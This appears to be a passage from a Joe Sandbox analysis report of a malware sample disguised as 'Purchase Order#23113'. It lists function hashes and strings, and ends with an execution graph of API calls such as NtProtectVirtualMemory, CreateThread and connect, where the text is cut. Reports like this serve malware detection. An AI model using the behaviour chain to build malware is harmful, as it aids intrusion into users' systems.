                                                                            • API String ID:
                                                                            • Opcode ID: 82f13cf88bce29887ea2196bd94a27650b89ca939c97bbeb4c5b1493139fc770
                                                                            • Instruction ID: f428b440904f63840e068487438a61118f193e6f22775b3dafd8b63b4f706e18
                                                                            • Opcode Fuzzy Hash: 82f13cf88bce29887ea2196bd94a27650b89ca939c97bbeb4c5b1493139fc770
                                                                            • Instruction Fuzzy Hash: 3590026124580403D24075584844607900697D0312F95C021A2064569ECA298E516237
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01773010 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 91ccbaa562b11ea1727dc2db0e3904bd740f824a10ed7ea90acaed375b1ef702
                                                                            • Instruction ID: b613f800cab27dc1e4bb588023f2e6dc194911904b434e8f499d543e9256553c
                                                                            • Opcode Fuzzy Hash: 91ccbaa562b11ea1727dc2db0e3904bd740f824a10ed7ea90acaed375b1ef702
                                                                            • Instruction Fuzzy Hash: 4D90022124584442D24072584844B0FD10697E1312FD5C029A4156568CC9158A555723
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01773090 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83a91da17031f3e8e628d387239ba6ed6234d21e62fc20193ee8158d8bd1cdaf
                                                                            • Instruction ID: e8e7e39006f20b483b1194000271a9ce3fff5906dceb401be100a98fbf651ec5
                                                                            • Opcode Fuzzy Hash: 83a91da17031f3e8e628d387239ba6ed6234d21e62fc20193ee8158d8bd1cdaf
                                                                            • Instruction Fuzzy Hash: 3690022128540802D240715884547079007D7D0711F95C021A0024568DC6168B6567B3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017735C0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                                                                            • Instruction ID: 5a6a5f4da644db9e3a020c544c58c31cb8f4e9c20a8af636046f37b102092ec6
                                                                            • Opcode Fuzzy Hash: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
                                                                            • Instruction Fuzzy Hash: 8E90023164950402D20071584554706A00697D0311FA5C421A042457CDC7958B5166A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017739B0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3647eca601aa4ddddca599a1b209ec2a4afafeba23f596413f465bd34e32928b
                                                                            • Instruction ID: d3b3e244d1c452e1156b687b7102affa3fa5663a33848cf1c91668c4e997b159
                                                                            • Opcode Fuzzy Hash: 3647eca601aa4ddddca599a1b209ec2a4afafeba23f596413f465bd34e32928b
                                                                            • Instruction Fuzzy Hash: 6390022128945102D250715C4444616D006B7E0311F95C031A08145A8DC5558A556323
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01773D70 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3e6dc7bd5ab14691cf29c4ab53c1e10ce76e40388b9cd55b232ae92106382c5
                                                                            • Instruction ID: 3cd7118e8c4b8f0fdae1ad62ef8c7b8668ddf5527a3c938c930d988426ce9b7c
                                                                            • Opcode Fuzzy Hash: e3e6dc7bd5ab14691cf29c4ab53c1e10ce76e40388b9cd55b232ae92106382c5
                                                                            • Instruction Fuzzy Hash: 3890023524540402D61071585844646904797D0311F95D421A042456CDC6548AA1A223
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01773D10 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 981ea38d913e2cafc222ab8039ab6fd7cc2a09c087bccaa380606321f2869d60
                                                                            • Instruction ID: 01ccd5f772221dfd8fcb734b6803d4f4dcfefe06ae21f56f9dd93d232d5e1053
                                                                            • Opcode Fuzzy Hash: 981ea38d913e2cafc222ab8039ab6fd7cc2a09c087bccaa380606321f2869d60
                                                                            • Instruction Fuzzy Hash: A990023124640142964072585844A4ED10697E1312BD5D425A0015568CC9148A615323
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 3359e3763cde15d4dfcf781cfa0b1add1cbe46feebc32dc6a0fa385504687a48
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                            • Instruction ID: c36ed54a1c50f272d8ce9102c9b1608a40863b64ae524cfb324e400637d69a8b
                                                                            • Opcode Fuzzy Hash: 08171dfc47b51d683078dff7b81dc4da9a8ca70ed3c47d555aed9f505293885e
                                                                            • Instruction Fuzzy Hash: 2651E8B5A00116BFDF11DB9C889097EFBB8BB48240B548269F5A5E7646D334DE40CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                            • Instruction ID: 5698160bf4b54df8080d47a94eb3d93264229ccc79995da84207c64c8e45ff63
                                                                            • Opcode Fuzzy Hash: 6417eeacf562209f587dd9ddc14b3a15afb0892d6f045cade1444b59b1f994bf
                                                                            • Instruction Fuzzy Hash: F451F7B1A00645AECB30DF5CC99497FFBFCEB4C200B1484A9E596D7643EAB4EE408760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A46FC
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4655
                                                                            • ExecuteOptions, xrefs: 017A46A0
                                                                            • Execute=1, xrefs: 017A4713
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4787
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A4742
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                            • Instruction ID: e0e2a32de2b374f20e02bd3302117b326bee40e747b4f1d5f6bc2b85d6eca8f6
                                                                            • Opcode Fuzzy Hash: e831eea7a8ab1139ec9a7772bad6206688b8add1e1833c4b1e4306371dc765c6
                                                                            • Instruction Fuzzy Hash: B3513B71600219BAEF25AAA8DC99FEDF7BCEF14348F4401E9DA05AB181E7719E418F50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01806940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction ID: 3bee79b3e0be4b0c9febe298baf1d389d433fd6b5b65437f558d2b6b3acc53b0
                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction Fuzzy Hash: 420249705083469FD756CF18C894A6BBBE5FFC8704F10892DF9858B2A4E731EA45CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0177B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction ID: 1bb7149d1a0cb93d38ecdca879809e52650bba104c9df50c27eafb636c1206a1
                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction Fuzzy Hash: 6A81F370E452498EEF25CF6CC8907FEFBB1AF85320F18465AE961E7295C7309840CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                                                                            • Instruction ID: 20254af916543ff511e6208330d0042110bf8f94ebc7ab42019548e7358be7f2
                                                                            • Opcode Fuzzy Hash: 8ed0f896f47c188ab900f7f3fb57742a0f9d3d842f4b2555b9fbe6a9e3ba2be5
                                                                            • Instruction Fuzzy Hash: 8421517AA00119ABDB11DE7DC848AAEFBEDEF58644F140126E915E3205E730DA058BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0175F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017A02BD
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017A02E7
                                                                            • RTL: Re-Waiting, xrefs: 017A031E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                            • Instruction ID: d41e43376ba3f03d8b9d101faf7e22051bc0e2757e27c2e4c0f805d852c8fb15
                                                                            • Opcode Fuzzy Hash: fec9b82cc3d4fc2513bde08f40f5d940dbcc1d987bf0f1ecc6a4625e52c9ca00
                                                                            • Instruction Fuzzy Hash: 99E1BC306087419FD765CF28C884B6AFBE0FB88314F540A6DF9A58B2E1D7B4E944CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017A7B7F
                                                                            • RTL: Resource at %p, xrefs: 017A7B8E
                                                                            • RTL: Re-Waiting, xrefs: 017A7BAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                            • Instruction ID: 57f9efc374f229f1e96087e10a56573ce7fcd30ea34db358e54a8b17c989daed
                                                                            • Opcode Fuzzy Hash: d7119c8843c1ef91a6153afd254a6557f6c8dd6d85eb3c101c23dd010dcead80
                                                                            • Instruction Fuzzy Hash: 8341E3713047029FD725DE29CC40BAAF7E9EF99710F100A2DF956DB690DB32E9058B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0176B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017A728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017A7294
                                                                            • RTL: Resource at %p, xrefs: 017A72A3
                                                                            • RTL: Re-Waiting, xrefs: 017A72C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                            • Instruction ID: e5c7221d74435754e70b1f76a828d022c359c70bfa21036d32797fb35a05964b
                                                                            • Opcode Fuzzy Hash: ef2f728a0a4362ff74ab582ef9694eaabde55c8eff55e2bea6e44ae2f753ff3c
                                                                            • Instruction Fuzzy Hash: 4F41F031704202ABD725DE29CC41BAAFBB9FB95710F100629FD55EB280DB21F84287D1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 017E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                            • Instruction ID: 60fd25e2c63f144399f9c4e662fcd30ee5bd82674714fdd0ac39bacda7b49c3e
                                                                            • Opcode Fuzzy Hash: ec1ca3065fcf90f0731e8a5b66a270b9cd65154204261415d05b3786a76bfc84
                                                                            • Instruction Fuzzy Hash: 22315472A00219AFDB20DE2DCC44BEEF7FCEB58610F54455AE949E3245EB309A458FA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01777D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction ID: 50e45cf47cb30262fda08364a591631b75d38129fd0e80e2deaa660339a2b138
                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                            • Instruction Fuzzy Hash: 8491E371E002069BEF28CF6DC989ABEFBA5EF44320F54491AE955E72C4E7708981C751
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01739126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                            • Instruction ID: bd230fedec3294854c65c95dbba2adf87ef4f038640cb517fe25e002e0fe0675
                                                                            • Opcode Fuzzy Hash: cb921bfcf9f4a4b910f4d57c310d82fcf5bd072fce7b9dbcd7d21da6f356f830
                                                                            • Instruction Fuzzy Hash: 22811B72D002699BDB31DF54CC45BEEB7B4AB48714F1041DAEA19B7681E7709E84CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:2.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:4.7%
                                                                            Total number of Nodes:444
                                                                            Total number of Limit Nodes:16
                                                                            execution_graph 13808 e638ce2 13810 e638dd9 13808->13810 13809 e639022 13810->13809 13814 e638352 13810->13814 13812 e638f0d 13812->13809 13823 e638792 13812->13823 13816 e63839e 13814->13816 13815 e63858e 13815->13812 13816->13815 13817 e6384ec 13816->13817 13819 e638595 13816->13819 13818 e63e232 NtCreateFile 13817->13818 13821 e6384ff 13818->13821 13819->13815 13820 e63e232 NtCreateFile 13819->13820 13820->13815 13821->13815 13822 e63e232 NtCreateFile 13821->13822 13822->13815 13824 e6387e0 13823->13824 13825 e63e232 NtCreateFile 13824->13825 13827 e63890c 13825->13827 13826 e638af3 13826->13812 13827->13826 13828 e638352 NtCreateFile 13827->13828 13829 e638602 NtCreateFile 13827->13829 13828->13827 13829->13827 13900 e635b66 13902 e635b6a 13900->13902 13901 e635cce 13902->13901 13903 e635cb5 CreateMutexW 13902->13903 13903->13901 13830 e63b2e4 13831 e63b36f 13830->13831 13832 e63b305 13830->13832 13832->13831 13834 e63b0c2 13832->13834 13835 e63b0cb 13834->13835 13837 e63b1f0 13834->13837 13836 e63ef82 6 API calls 13835->13836 13835->13837 13836->13837 13837->13831 13772 e63a22a 13773 e63a25e 13772->13773 13774 e6398c2 ObtainUserAgentString 13773->13774 13775 e63a26b 13774->13775 13776 e63442e 13777 e63445b 13776->13777 13785 e6344c9 13776->13785 13778 e63e232 NtCreateFile 13777->13778 13777->13785 13779 e634496 13778->13779 13780 e634082 NtCreateFile 13779->13780 13784 e6344c5 13779->13784 13782 e6344b6 13780->13782 13781 e63e232 NtCreateFile 13781->13785 13783 e633f52 NtCreateFile 13782->13783 13782->13784 13783->13784 13784->13781 13784->13785 13884 e640aa9 13885 e640aaf 13884->13885 13888 e63b212 13885->13888 13887 e640ac7 13889 e63b237 13888->13889 13890 e63b21b 13888->13890 13889->13887 13890->13889 13891 e63b0c2 6 API calls 13890->13891 13891->13889 13936 e63b72e 13937 e63b788 connect 13936->13937 13938 e63b76a 13936->13938 13938->13937 13607 e63fbac 13609 e63fbb1 13607->13609 13608 e63fbb6 13609->13608 13642 e635b72 13609->13642 13611 e63fc2c 13611->13608 13612 e63fc85 13611->13612 13614 e63fc54 13611->13614 13615 e63fc69 13611->13615 13613 e63dab2 NtProtectVirtualMemory 13612->13613 13616 e63fc8d 13613->13616 13617 e63dab2 NtProtectVirtualMemory 13614->13617 13618 e63fc80 13615->13618 13619 e63fc6e 13615->13619 13678 e637102 13616->13678 13622 e63fc5c 13617->13622 13618->13612 13620 e63fc97 13618->13620 13623 e63dab2 NtProtectVirtualMemory 13619->13623 13624 e63fcbe 13620->13624 13625 e63fc9c 13620->13625 13664 e636ee2 13622->13664 13627 e63fc76 13623->13627 13624->13608 13629 e63fcc7 13624->13629 13630 e63fcd9 13624->13630 13646 e63dab2 13625->13646 13670 e636fc2 13627->13670 13631 e63dab2 NtProtectVirtualMemory 13629->13631 13630->13608 13634 e63dab2 NtProtectVirtualMemory 13630->13634 13633 e63fccf 13631->13633 13688 e6372f2 13633->13688 13637 e63fce5 13634->13637 13706 e637712 13637->13706 13644 e635b93 13642->13644 13643 e635cce 13643->13611 13644->13643 13645 e635cb5 CreateMutexW 13644->13645 13645->13643 13648 e63dadf 13646->13648 13647 e63debc 13656 e636de2 13647->13656 13648->13647 13718 e6338f2 13648->13718 13650 e63de5c 13651 e6338f2 NtProtectVirtualMemory 13650->13651 13652 e63de7c 13651->13652 13653 e6338f2 NtProtectVirtualMemory 13652->13653 13654 e63de9c 13653->13654 13655 e6338f2 NtProtectVirtualMemory 13654->13655 13655->13647 13658 e636df0 13656->13658 13657 e636ecd 13660 e633412 13657->13660 13658->13657 13741 e63a382 13658->13741 13662 e633440 13660->13662 13661 e633473 13661->13608 13662->13661 13663 e63344d CreateThread 13662->13663 13663->13608 13666 e636f06 13664->13666 13665 e636fa4 13665->13608 13666->13665 13667 e6338f2 NtProtectVirtualMemory 13666->13667 13668 e636f9c 13667->13668 13669 e63a382 ObtainUserAgentString 13668->13669 13669->13665 13672 e637016 13670->13672 13671 e6370f0 13671->13608 13672->13671 13675 e6338f2 NtProtectVirtualMemory 13672->13675 13676 e6370bb 13672->13676 13673 e6370e8 13674 e63a382 ObtainUserAgentString 13673->13674 13674->13671 13675->13676 13676->13673 13677 e6338f2 NtProtectVirtualMemory 13676->13677 13677->13673 13680 e637137 13678->13680 13679 e6372d5 13679->13608 13680->13679 13681 e6338f2 NtProtectVirtualMemory 13680->13681 13682 e63728a 13681->13682 13683 e6338f2 NtProtectVirtualMemory 13682->13683 13686 e6372a9 13683->13686 13684 e6372cd 13685 e63a382 ObtainUserAgentString 13684->13685 13685->13679 13686->13684 13687 e6338f2 NtProtectVirtualMemory 13686->13687 13687->13684 13689 e637349 13688->13689 13690 e63749f 13689->13690 13692 e6338f2 NtProtectVirtualMemory 13689->13692 13691 e6338f2 NtProtectVirtualMemory 13690->13691 13695 e6374c3 13690->13695 13691->13695 13693 e637480 13692->13693 13694 e6338f2 NtProtectVirtualMemory 13693->13694 13694->13690 13696 e6338f2 NtProtectVirtualMemory 13695->13696 13697 e637597 13695->13697 13696->13697 13698 e6338f2 NtProtectVirtualMemory 13697->13698 13699 e6375bf 13697->13699 13698->13699 13702 e6338f2 NtProtectVirtualMemory 13699->13702 13703 e6376b9 13699->13703 13700 e6376e1 13701 e63a382 ObtainUserAgentString 13700->13701 13704 e6376e9 13701->13704 13702->13703 13703->13700 13705 e6338f2 NtProtectVirtualMemory 13703->13705 13704->13608 13705->13700 13707 e637767 13706->13707 13708 e6338f2 NtProtectVirtualMemory 13707->13708 13712 e637903 13707->13712 13709 e6378e3 13708->13709 13710 e6338f2 NtProtectVirtualMemory 13709->13710 13710->13712 13711 e6379b7 13713 e63a382 ObtainUserAgentString 13711->13713 13714 e6338f2 NtProtectVirtualMemory 13712->13714 13715 e637992 13712->13715 13716 e6379bf 13713->13716 13714->13715 13715->13711 13717 e6338f2 NtProtectVirtualMemory 13715->13717 13716->13608 13717->13711 13719 e633987 13718->13719 13722 e6339b2 13719->13722 13733 e634622 13719->13733 13721 e633c0c 13721->13650 13722->13721 13723 e633ba2 13722->13723 13725 e633ac5 13722->13725 13724 e63fe12 NtProtectVirtualMemory 13723->13724 13732 e633b5b 13724->13732 13737 e63fe12 13725->13737 13727 e63fe12 NtProtectVirtualMemory 13727->13721 13728 e633ae3 